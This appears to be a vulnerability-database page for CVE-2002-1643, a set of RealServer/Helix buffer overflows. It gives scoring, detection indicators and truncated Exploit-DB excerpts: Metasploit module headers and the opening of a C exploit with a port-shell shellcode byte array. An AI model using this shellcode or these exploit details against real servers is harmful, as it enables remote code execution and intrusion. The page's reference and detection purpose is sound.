CVE-2002-1643
published 2002-12-19CVE-2002-1643: Multiple buffer overflows in RealNetworks Helix Universal Server 9.0 (9.0.2.768) allow remote attackers to execute arbitrary code via (1) a long Transport…
PriorityP350high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
74.32%
99.4th percentile
Multiple buffer overflows in RealNetworks Helix Universal Server 9.0 (9.0.2.768) allow remote attackers to execute arbitrary code via (1) a long Transport field in a SETUP RTSP request, (2) a DESCRIBE RTSP request with a long URL argument, or (3) two simultaneous HTTP GET requests with long arguments.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| realnetworks | helix_universal_server | — | — |
| realnetworks | helix_universal_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect exploit attempts by matching RTSP DESCRIBE requests containing a URI with 560 or more repeated '../' traversal sequences followed by a '.smi' extension ↗
- →Detect exploit attempts by matching RTSP SETUP requests with an abnormally long Transport header field ↗
- →Detect exploit attempts by matching RTSP DESCRIBE requests with an abnormally long URL argument ↗
- →Detect exploit attempts via two simultaneous HTTP GET requests with long arguments targeting RealServer ↗
- →Use RTSP OPTIONS probe to fingerprint vulnerable RealServer instances; a Server header in the response indicates a potentially vulnerable target ↗
- →Payload bad characters for this exploit include null bytes, newlines, carriage returns, percent signs, dots, forward/back slashes, spaces, colons, ampersands, question marks, and equals signs — filter or alert on percent-encoded shellcode in RTSP URIs ↗
- →Exploit sends a 4131-byte buffer over TCP port 554; alert on oversized RTSP request payloads to RealServer ↗
- ·The Metasploit module targets RealServer versions 7, 8, and 9 across Linux, BSD, and Windows platforms using a single 'Universal' target with no per-platform ROP/return address differentiation ↗
- ·The exploit module notes that the master rmserver process must be killed to prevent shell disconnect after exploitation ↗
- ·The Windows shellcode (w32portshell) opens a reverse shell on port 31337; defenders should monitor for unexpected outbound connections on this port from RealServer processes ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
RealServer - Describe Buffer Overflow (Metasploit)
exploitdb·2010-08-07
CVE-2002-1643 RealServer - Describe Buffer Overflow (Metasploit)
RealServer - Describe Buffer Overflow (Metasploit)
---
##
# $Id: describe.rb 9971 2010-08-07 06:59:16Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/exploit/http/client'
class Metasploit3 'RealServer Describe Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in RealServer 7/8/9
and was based on Johnny Cyberpunk's THCrealbad exploit. This
code should reliably exploit Linux, BSD, and Windows-based
servers.
},
'Author' => 'hdm',
'Version' => '$Revision: 9971 $',
'References' =>
[
[ 'CVE', '2002-1643' ],
[ '
Exploit-DB
RealServer < 8.0.2 (Windows Platforms) - Remote Overflow
exploitdb·2003-04-30
CVE-2002-1643 RealServer < 8.0.2 (Windows Platforms) - Remote Overflow
RealServer
#include
#include
#include
char w32portshell[] =
"\x8b\xfa\x33\xc9\xb2\x35\x90\x90\x90\x66\x81\xc1\x38\x01\x83"
"\xc7\x1a\x8a\x1f\x32\xda\x88\x1f\x47\xe2\xf7\xde\x16\x4f\x5c"
"\x37\x30\x59\x6c\xcd\x28\xa9\xeb\xb9\xe4\x79\x45\xe1\x36\xc5"
"\x12\x15\x15\x05\x3d\x62\x66\x07\x6a\x06\x07\x1b\x71\x79\x79"
"\x34\xde\x30\xdd\xcc\xca\xca\xca\x68\xb6\xd8\x1f\x5f\x05\x6c"
"\x51\xbe\x34\xbe\x75\x39\xbe\x45\x29\x98\xbe\x4d\x3d\xb8\x6a"
"\x09\xbe\x2e\x34\xce\xbe\x6e\x4d\x34\xce\xbe\x7e\x29\x34\xcc"
"\xbe\x66\x11\x34\xcf\x66\x64\x67\xbe\x6e\x15\x34\xce\x04\xfc"
"\x74\x04\xf5\xac\xbe\x01\xbe\x34\xcb\x99\x04\xf7\xe4\xd7\xb1"
"\xf5\x40\xc2\x3a\x83\x70\x30\xb8\x71\x70\x31\x53\x0c\x25\x40"
"\xd4\x53\x04\x25\x6f\x6d\x6b\x63\x65\x67\x1e\x7b\x25\x74\x3a"
"\x82\x39\x7f\xbe\x31\xbd\x34\xcd\x3a\x83\x78\
Exploit-DB
RealServer 7-9 - Describe Buffer Overflow (Metasploit)
exploitdb·2002-12-20
CVE-2002-1643 RealServer 7-9 - Describe Buffer Overflow (Metasploit)
RealServer 7-9 - Describe Buffer Overflow (Metasploit)
---
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/exploit/http'
class Metasploit3 'RealServer Describe Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in RealServer 7/8/9
and was based on Johnny Cyberpunk's THCrealbad exploit. This
code should reliably exploit Linux, BSD, and Windows-based
servers.
},
'Author' => 'hdm',
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '4468'],
[ 'URL', 'http://lists.immunitysec.com/pipermail/dailydave/20
Metasploit
RealServer Describe Buffer Overflow
metasploit
RealServer Describe Buffer Overflow
RealServer Describe Buffer Overflow
This module exploits a buffer overflow in RealServer 7/8/9 and was based on Johnny Cyberpunk's THCrealbad exploit. This code should reliably exploit Linux, BSD, and Windows-based servers.
No writeups or analysis indexed.
http://www.kb.cert.org/vuls/id/974689http://www.nextgenss.com/advisories/realhelix.txthttp://www.securityfocus.com/archive/1/304203http://www.securityfocus.com/bid/6454http://www.securityfocus.com/bid/6456http://www.securityfocus.com/bid/6458http://www.service.real.com/help/faq/security/bufferoverrun12192002.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/10915https://exchange.xforce.ibmcloud.com/vulnerabilities/10916https://exchange.xforce.ibmcloud.com/vulnerabilities/10917http://www.kb.cert.org/vuls/id/974689http://www.nextgenss.com/advisories/realhelix.txthttp://www.securityfocus.com/archive/1/304203http://www.securityfocus.com/bid/6454http://www.securityfocus.com/bid/6456http://www.securityfocus.com/bid/6458http://www.service.real.com/help/faq/security/bufferoverrun12192002.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/10915https://exchange.xforce.ibmcloud.com/vulnerabilities/10916https://exchange.xforce.ibmcloud.com/vulnerabilities/10917
2002-12-19
Published